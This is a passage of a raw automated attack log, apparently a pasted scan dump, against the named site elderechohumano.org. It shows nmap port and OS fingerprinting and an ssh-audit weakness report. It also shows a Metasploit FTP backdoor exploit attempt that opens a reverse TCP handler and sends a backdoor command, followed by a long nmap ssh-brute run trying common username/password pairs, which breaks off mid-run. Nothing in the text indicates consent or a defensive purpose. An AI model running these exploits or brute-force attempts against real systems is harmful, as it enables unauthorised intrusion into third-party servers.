  756. Nmap done: 1 IP address (1 host up) scanned in 8.53 seconds
  757. #######################################################################################################################################
  758. Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-23 02:10 EDT
  759. Nmap scan report for elderechohumano.org (51.255.33.229)
  760. Host is up (0.48s latency).
  761. rDNS record for 51.255.33.229: 229.ip-51-255-33.eu
  762.  
  763. PORT STATE SERVICE
  764. 53/udp open domain
  765. 67/udp open|filtered dhcps
  766. 68/udp open|filtered dhcpc
  767. 69/udp open|filtered tftp
  768. 88/udp open|filtered kerberos-sec
  769. 123/udp open|filtered ntp
  770. 137/udp open|filtered netbios-ns
  771. 138/udp open|filtered netbios-dgm
  772. 139/udp open|filtered netbios-ssn
  773. 161/udp open|filtered snmp
  774. 162/udp open|filtered snmptrap
  775. 389/udp open|filtered ldap
  776. 520/udp open|filtered route
  777. 2049/udp open|filtered nfs
  778.  
  779. Nmap done: 1 IP address (1 host up) scanned in 6.35 seconds
  780. #######################################################################################################################################
  781. + -- --=[Port 21 opened... running tests...
  782. Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-23 02:10 EDT
  783. Nmap scan report for elderechohumano.org (51.255.33.229)
  784. Host is up (0.39s latency).
  785. rDNS record for 51.255.33.229: 229.ip-51-255-33.eu
  786.  
  787. PORT STATE SERVICE VERSION
  788. 21/tcp open ftp ProFTPD
  789. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  790. Device type: WAP|general purpose
  791. Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 3.X|2.6.X (93%)
  792. OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:3.2.0 cpe:/o:linux:linux_kernel:2.6
  793. Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 3.2.0 (93%), Linux 2.6.18 - 2.6.22 (93%)
  794. No exact OS matches for host (test conditions non-ideal).
  795. Network Distance: 1 hop
  796. Service Info: Host: 51.255.33.229; OS: Unix
  797.  
  798. TRACEROUTE (using port 21/tcp)
  799. HOP RTT ADDRESS
  800. 1 479.61 ms 229.ip-51-255-33.eu (51.255.33.229)
  801.  
  802. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  803. Nmap done: 1 IP address (1 host up) scanned in 613.26 seconds
  804. ____________
  805. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
  806. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
  807. [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
  808. [% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
  809. [% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
  810. [% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
  811. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
  812. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
  813. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
  814. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
  815.  
  816.  
  817. =[ metasploit v4.16.57-dev ]
  818. + -- --=[ 1767 exploits - 1007 auxiliary - 307 post ]
  819. + -- --=[ 537 payloads - 41 encoders - 10 nops ]
  820. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  821.  
  822. RHOST => elderechohumano.org
  823. RHOSTS => elderechohumano.org
  824. [*] elderechohumano.org:21 - Banner: 220 51.255.33.229 FTP server ready
  825. [*] elderechohumano.org:21 - USER: 550 SSL/TLS required on the control channel
  826. [-] elderechohumano.org:21 - This server did not respond as expected: 550 SSL/TLS required on the control channel
  827. [*] Exploit completed, but no session was created.
  828. [*] Started reverse TCP double handler on 10.211.1.5:4444
  829. [*] elderechohumano.org:21 - Sending Backdoor Command
  830. [*] Exploit completed, but no session was created.
  831. + -- --=[Port 22 opened... running tests...
  832. # general
  833. (gen) banner: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.10
  834. (gen) software: OpenSSH 6.6.1p1
  835. (gen) compatibility: OpenSSH 6.5-6.6, Dropbear SSH 2013.62+ (some functionality from 0.52)
  836. (gen) compression: enabled (zlib@openssh.com)
  837.  
  838. # key exchange algorithms
  839. (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
  840. (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
  841. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  842. (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
  843. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  844. (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
  845. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  846. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  847. `- [info] available since OpenSSH 4.4
  848. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  849. `- [warn] using weak hashing algorithm
  850. `- [info] available since OpenSSH 2.3.0
  851. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
  852. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  853. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  854. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
  855. `- [warn] using small 1024-bit modulus
  856. `- [warn] using weak hashing algorithm
  857. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  858.  
  859. # host-key algorithms
  860. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  861. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  862. `- [warn] using small 1024-bit modulus
  863. `- [warn] using weak random number generator could reveal the key
  864. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  865. (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
  866. `- [warn] using weak random number generator could reveal the key
  867. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  868. (key) ssh-ed25519 -- [info] available since OpenSSH 6.5
  869.  
  870. # encryption algorithms (ciphers)
  871. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  872. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  873. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  874. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  875. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  876. `- [warn] using weak cipher
  877. `- [info] available since OpenSSH 4.2
  878. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  879. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  880. `- [warn] using weak cipher
  881. `- [info] available since OpenSSH 4.2
  882. (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
  883. (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
  884. (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
  885. `- [info] default cipher since OpenSSH 6.9.
  886. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  887. `- [warn] using weak cipher mode
  888. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  889. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  890. `- [warn] using weak cipher
  891. `- [warn] using weak cipher mode
  892. `- [warn] using small 64-bit block size
  893. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  894. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  895. `- [fail] disabled since Dropbear SSH 0.53
  896. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  897. `- [warn] using weak cipher mode
  898. `- [warn] using small 64-bit block size
  899. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  900. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  901. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  902. `- [warn] using weak cipher mode
  903. `- [warn] using small 64-bit block size
  904. `- [info] available since OpenSSH 2.1.0
  905. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  906. `- [warn] using weak cipher mode
  907. `- [info] available since OpenSSH 2.3.0
  908. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  909. `- [warn] using weak cipher mode
  910. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
  911. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  912. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  913. `- [warn] using weak cipher
  914. `- [info] available since OpenSSH 2.1.0
  915. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  916. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  917. `- [warn] using weak cipher mode
  918. `- [info] available since OpenSSH 2.3.0
  919.  
  920. # message authentication code algorithms
  921. (mac) hmac-md5-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  922. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  923. `- [warn] using weak hashing algorithm
  924. `- [info] available since OpenSSH 6.2
  925. (mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
  926. `- [info] available since OpenSSH 6.2
  927. (mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
  928. `- [info] available since OpenSSH 6.2
  929. (mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
  930. (mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
  931. (mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
  932. (mac) hmac-ripemd160-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  933. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  934. `- [info] available since OpenSSH 6.2
  935. (mac) hmac-sha1-96-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  936. `- [warn] using weak hashing algorithm
  937. `- [info] available since OpenSSH 6.2
  938. (mac) hmac-md5-96-etm@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  939. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  940. `- [warn] using weak hashing algorithm
  941. `- [info] available since OpenSSH 6.2
  942. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  943. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  944. `- [warn] using encrypt-and-MAC mode
  945. `- [warn] using weak hashing algorithm
  946. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  947. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
  948. `- [warn] using weak hashing algorithm
  949. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  950. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
  951. `- [warn] using small 64-bit tag size
  952. `- [info] available since OpenSSH 4.7
  953. (mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
  954. `- [info] available since OpenSSH 6.2
  955. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  956. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  957. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  958. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  959. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  960. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  961. `- [warn] using encrypt-and-MAC mode
  962. `- [info] available since OpenSSH 2.5.0
  963. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  964. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  965. `- [warn] using encrypt-and-MAC mode
  966. `- [info] available since OpenSSH 2.1.0
  967. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  968. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  969. `- [warn] using encrypt-and-MAC mode
  970. `- [warn] using weak hashing algorithm
  971. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
  972. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  973. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  974. `- [warn] using encrypt-and-MAC mode
  975. `- [warn] using weak hashing algorithm
  976. `- [info] available since OpenSSH 2.5.0
  977.  
  978. # algorithm recommendations (for OpenSSH 6.6.1)
  979. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
  980. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
  981. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
  982. (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
  983. (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
  984. (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
  985. (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
  986. (rec) -ssh-dss -- key algorithm to remove
  987. (rec) -arcfour -- enc algorithm to remove
  988. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
  989. (rec) -blowfish-cbc -- enc algorithm to remove
  990. (rec) -3des-cbc -- enc algorithm to remove
  991. (rec) -aes256-cbc -- enc algorithm to remove
  992. (rec) -arcfour256 -- enc algorithm to remove
  993. (rec) -cast128-cbc -- enc algorithm to remove
  994. (rec) -aes192-cbc -- enc algorithm to remove
  995. (rec) -arcfour128 -- enc algorithm to remove
  996. (rec) -aes128-cbc -- enc algorithm to remove
  997. (rec) -hmac-sha2-512 -- mac algorithm to remove
  998. (rec) -hmac-md5-96 -- mac algorithm to remove
  999. (rec) -hmac-md5-etm@openssh.com -- mac algorithm to remove
  1000. (rec) -hmac-sha1-96-etm@openssh.com -- mac algorithm to remove
  1001. (rec) -hmac-ripemd160-etm@openssh.com -- mac algorithm to remove
  1002. (rec) -hmac-md5-96-etm@openssh.com -- mac algorithm to remove
  1003. (rec) -hmac-sha2-256 -- mac algorithm to remove
  1004. (rec) -hmac-ripemd160 -- mac algorithm to remove
  1005. (rec) -umac-128@openssh.com -- mac algorithm to remove
  1006. (rec) -hmac-sha1-96 -- mac algorithm to remove
  1007. (rec) -umac-64@openssh.com -- mac algorithm to remove
  1008. (rec) -hmac-md5 -- mac algorithm to remove
  1009. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
  1010. (rec) -hmac-sha1 -- mac algorithm to remove
  1011. (rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
  1012. (rec) -umac-64-etm@openssh.com -- mac algorithm to remove
  1013.  
  1014. Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-23 02:20 EDT
  1015. NSE: [ssh-run] Failed to specify credentials and command to run.
  1016. NSE: [ssh-brute] Trying username/password pair: root:root
  1017. NSE: [ssh-brute] Trying username/password pair: admin:admin
  1018. NSE: [ssh-brute] Trying username/password pair: administrator:administrator
  1019. NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
  1020. NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
  1021. NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
  1022. NSE: [ssh-brute] Trying username/password pair: guest:guest
  1023. NSE: [ssh-brute] Trying username/password pair: user:user
  1024. NSE: [ssh-brute] Trying username/password pair: web:web
  1025. NSE: [ssh-brute] Trying username/password pair: test:test
  1026. NSE: [ssh-brute] Trying username/password pair: root:
  1027. NSE: [ssh-brute] Trying username/password pair: admin:
  1028. NSE: [ssh-brute] Trying username/password pair: administrator:
  1029. NSE: [ssh-brute] Trying username/password pair: webadmin:
  1030. NSE: [ssh-brute] Trying username/password pair: sysadmin:
  1031. NSE: [ssh-brute] Trying username/password pair: netadmin:
  1032. NSE: [ssh-brute] Trying username/password pair: guest:
  1033. NSE: [ssh-brute] Trying username/password pair: user:
  1034. NSE: [ssh-brute] Trying username/password pair: web:
  1035. NSE: [ssh-brute] Trying username/password pair: test:
  1036. NSE: [ssh-brute] Trying username/password pair: root:123456
  1037. NSE: [ssh-brute] Trying username/password pair: admin:123456
  1038. NSE: [ssh-brute] Trying username/password pair: administrator:123456
  1039. NSE: [ssh-brute] Trying username/password pair: webadmin:123456
  1040. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
  1041. NSE: [ssh-brute] Trying username/password pair: netadmin:123456
  1042. NSE: [ssh-brute] Trying username/password pair: guest:123456
  1043. NSE: [ssh-brute] Trying username/password pair: user:123456
  1044. NSE: [ssh-brute] Trying username/password pair: web:123456
  1045. NSE: [ssh-brute] Trying username/password pair: test:123456
  1046. NSE: [ssh-brute] Trying username/password pair: root:12345
  1047. NSE: [ssh-brute] Trying username/password pair: admin:12345
  1048. NSE: [ssh-brute] Trying username/password pair: administrator:12345
  1049. NSE: [ssh-brute] Trying username/password pair: webadmin:12345
  1050. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
  1051. NSE: [ssh-brute] Trying username/password pair: netadmin:12345
  1052. NSE: [ssh-brute] Trying username/password pair: guest:12345
  1053. NSE: [ssh-brute] Trying username/password pair: user:12345
  1054. NSE: [ssh-brute] Trying username/password pair: web:12345
  1055. NSE: [ssh-brute] Trying username/password pair: test:12345
  1056. NSE: [ssh-brute] Trying username/password pair: root:123456789
  1057. NSE: [ssh-brute] Trying username/password pair: admin:123456789
  1058. NSE: [ssh-brute] Trying username/password pair: administrator:123456789
  1059. NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
  1060. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
  1061. NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
  1062. NSE: [ssh-brute] Trying username/password pair: guest:123456789
  1063. NSE: [ssh-brute] Trying username/password pair: user:123456789
  1064. NSE: [ssh-brute] Trying username/password pair: web:123456789
  1065. NSE: [ssh-brute] Trying username/password pair: test:123456789
  1066. NSE: [ssh-brute] Trying username/password pair: root:password
  1067. NSE: [ssh-brute] Trying username/password pair: admin:password
  1068. NSE: [ssh-brute] Trying username/password pair: administrator:password
  1069. NSE: [ssh-brute] Trying username/password pair: webadmin:password
  1070. NSE: [ssh-brute] Trying username/password pair: sysadmin:password
  1071. NSE: [ssh-brute] Trying username/password pair: netadmin:password
  1072. NSE: [ssh-brute] Trying username/password pair: guest:password
  1073. NSE: [ssh-brute] Trying username/password pair: user:password
  1074. NSE: [ssh-brute] Trying username/password pair: web:password
  1075. NSE: [ssh-brute] Trying username/password pair: test:password
  1076. NSE: [ssh-brute] Trying username/password pair: root:iloveyou
  1077. NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
  1078. NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
  1079. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
  1080. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
  1081. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
  1082. NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
  1083. NSE: [ssh-brute] Trying username/password pair: user:iloveyou
  1084. NSE: [ssh-brute] Trying username/password pair: web:iloveyou
  1085. NSE: [ssh-brute] Trying username/password pair: test:iloveyou
  1086. NSE: [ssh-brute] Trying username/password pair: root:princess
  1087. NSE: [ssh-brute] Trying username/password pair: admin:princess
  1088. NSE: [ssh-brute] Trying username/password pair: administrator:princess
  1089. NSE: [ssh-brute] Trying username/password pair: webadmin:princess
  1090. NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
  1091. NSE: [ssh-brute] Trying username/password pair: netadmin:princess
  1092. NSE: [ssh-brute] Trying username/password pair: guest:princess
  1093. NSE: [ssh-brute] Trying username/password pair: user:princess
  1094. NSE: [ssh-brute] Trying username/password pair: web:princess
  1095. NSE: [ssh-brute] Trying username/password pair: test:princess
  1096. NSE: [ssh-brute] Trying username/password pair: root:12345678
  1097. NSE: [ssh-brute] Trying username/password pair: admin:12345678
  1098. NSE: [ssh-brute] Trying username/password pair: administrator:12345678
  1099. NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
  1100. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
  1101. NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
  1102. NSE: [ssh-brute] Trying username/password pair: guest:12345678
  1103. NSE: [ssh-brute] Trying username/password pair: user:12345678
  1104. NSE: [ssh-brute] Trying username/password pair: web:12345678
  1105. NSE: [ssh-brute] Trying username/password pair: test:12345678
  1106. NSE: [ssh-brute] Trying username/password pair: root:1234567
  1107. NSE: [ssh-brute] Trying username/password pair: admin:1234567
  1108. NSE: [ssh-brute] Trying username/password pair: administrator:1234567
  1109. NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
  1110. NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
  1111. NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
  1112. NSE: [ssh-brute] Trying username/password pair: guest:1234567
  1113. NSE: [ssh-brute] Trying username/password pair: user:1234567
  1114. NSE: [ssh-brute] Trying username/password pair: web:1234567
  1115. NSE: [ssh-brute] Trying username/password pair: test:1234567
  1116. NSE: [ssh-brute] Trying username/password pair: root:abc123
  1117. NSE: [ssh-brute] Trying username/password pair: admin:abc123
  1118. NSE: [ssh-brute] Trying username/password pair: administrator:abc123
  1119. NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
  1120. NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
  1121. NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
  1122. NSE: [ssh-brute] Trying username/password pair: guest:abc123
  1123. NSE: [ssh-brute] Trying username/password pair: user:abc123
  1124. NSE: [ssh-brute] Trying username/password pair: web:abc123
  1125. NSE: [ssh-brute] Trying username/password pair: test:abc123
  1126. NSE: [ssh-brute] Trying username/password pair: root:nicole
  1127. NSE: [ssh-brute] Trying username/password pair: admin:nicole
  1128. NSE: [ssh-brute] Trying username/password pair: administrator:nicole
  1129. NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
  1130. NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
  1131. NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
  1132. NSE: [ssh-brute] Trying username/password pair: guest:nicole
  1133. NSE: [ssh-brute] Trying username/password pair: user:nicole
  1134. NSE: [ssh-brute] Trying username/password pair: web:nicole
  1135. NSE: [ssh-brute] Trying username/password pair: test:nicole
  1136. NSE: [ssh-brute] Trying username/password pair: root:daniel
  1137. NSE: [ssh-brute] Trying username/password pair: admin:daniel
  1138. NSE: [ssh-brute] Trying username/password pair: administrator:daniel
  1139. NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
  1140. NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
  1141. NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
  1142. NSE: [ssh-brute] Trying username/password pair: guest:daniel
  1143. NSE: [ssh-brute] Trying username/password pair: user:daniel
  1144. NSE: [ssh-brute] Trying username/password pair: web:daniel
  1145. NSE: [ssh-brute] Trying username/password pair: test:daniel
  1146. NSE: [ssh-brute] Trying username/password pair: root:monkey
  1147. NSE: [ssh-brute] Trying username/password pair: admin:monkey
  1148. NSE: [ssh-brute] Trying username/password pair: administrator:monkey
  1149. NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
  1150. NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
  1151. NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
  1152. NSE: [ssh-brute] Trying username/password pair: guest:monkey
  1153. NSE: [ssh-brute] Trying username/password pair: user:monkey
  1154. NSE: [ssh-brute] Trying username/password pair: web:monkey
  1155. NSE: [ssh-brute] Trying username/password pair: test:monkey
  1156. NSE: [ssh-brute] Trying username/password pair: root:babygirl
  1157. NSE: [ssh-brute] Trying username/password pair: admin:babygirl
  1158. NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
  1159. NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
  1160. NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
  1161. NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
  1162. NSE: [ssh-brute] Trying username/password pair: guest:babygirl
  1163. NSE: [ssh-brute] Trying username/password pair: user:babygirl
  1164. NSE: [ssh-brute] Trying username/password pair: web:babygirl
  1165. NSE: [ssh-brute] Trying username/password pair: test:babygirl
  1166. NSE: [ssh-brute] Trying username/password pair: root:qwerty
  1167. NSE: [ssh-brute] Trying username/password pair: admin:qwerty
  1168. NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
  1169. NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
  1170. NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
  1171. NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
  1172. NSE: [ssh-brute] Trying username/password pair: guest:qwerty
  1173. NSE: [ssh-brute] Trying username/password pair: user:qwerty
  1174. NSE: [ssh-brute] Trying username/password pair: web:qwerty
  1175. NSE: [ssh-brute] Trying username/password pair: test:qwerty
  1176. NSE: [ssh-brute] Trying username/password pair: root:lovely
  1177. NSE: [ssh-brute] Trying username/password pair: admin:lovely
  1178. NSE: [ssh-brute] Trying username/password pair: administrator:lovely
  1179. NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
  1180. NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
  1181. NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
  1182. NSE: [ssh-brute] Trying username/password pair: guest:lovely
  1183. NSE: [ssh-brute] Trying username/password pair: user:lovely
  1184. NSE: [ssh-brute] Trying username/password pair: web:lovely
  1185. NSE: [ssh-brute] Trying username/password pair: test:lovely
  1186. NSE: [ssh-brute] Trying username/password pair: root:654321
  1187. NSE: [ssh-brute] Trying username/password pair: admin:654321
  1188. NSE: [ssh-brute] Trying username/password pair: administrator:654321
  1189. NSE: [ssh-brute] Trying username/password pair: webadmin:654321
  1190. NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
  1191. NSE: [ssh-brute] Trying username/password pair: netadmin:654321
  1192. NSE: [ssh-brute] Trying username/password pair: guest:654321
  1193. NSE: [ssh-brute] Trying username/password pair: user:654321
  1194. NSE: [ssh-brute] Trying username/password pair: web:654321
  1195. NSE: [ssh-brute] Trying username/password pair: test:654321
  1196. NSE: [ssh-brute] Trying username/password pair: root:michael
  1197. NSE: [ssh-brute] Trying username/password pair: admin:michael
  1198. NSE: [ssh-brute] Trying username/password pair: administrator:michael
  1199. NSE: [ssh-brute] Trying username/password pair: webadmin:michael
  1200. NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
  1201. NSE: [ssh-brute] Trying username/password pair: netadmin:michael
  1202. NSE: [ssh-brute] Trying username/password pair: guest:michael
  1203. NSE: [ssh-brute] Trying username/password pair: user:michael
  1204. NSE: [ssh-brute] Trying username/password pair: web:michael
  1205. NSE: [ssh-brute] Trying username/password pair: test:michael
  1206. NSE: [ssh-brute] Trying username/password pair: root:jessica
  1207. NSE: [ssh-brute] Trying username/password pair: admin:jessica
  1208. NSE: [ssh-brute] Trying username/password pair: administrator:jessica
  1209. NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
  1210. NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
  1211. NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
  1212. NSE: [ssh-brute] Trying username/password pair: guest:jessica
  1213. NSE: [ssh-brute] Trying username/password pair: user:jessica
  1214. NSE: [ssh-brute] Trying username/password pair: web:jessica
  1215. NSE: [ssh-brute] Trying username/password pair: test:jessica
  1216. NSE: [ssh-brute] Trying username/password pair: root:111111
  1217. NSE: [ssh-brute] Trying username/password pair: admin:111111
  1218. NSE: [ssh-brute] Trying username/password pair: administrator:111111
  1219. NSE: [ssh-brute] Trying username/password pair: webadmin:111111
  1220. NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
  1221. NSE: [ssh-brute] Trying username/password pair: netadmin:111111
  1222. NSE: [ssh-brute] Trying username/password pair: guest:111111
  1223. NSE: [ssh-brute] Trying username/password pair: user:111111
  1224. NSE: [ssh-brute] Trying username/password pair: web:111111
  1225. NSE: [ssh-brute] Trying username/password pair: test:111111
  1226. NSE: [ssh-brute] Trying username/password pair: root:ashley
  1227. NSE: [ssh-brute] Trying username/password pair: admin:ashley
  1228. NSE: [ssh-brute] Trying username/password pair: administrator:ashley
  1229. NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
  1230. NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
  1231. NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
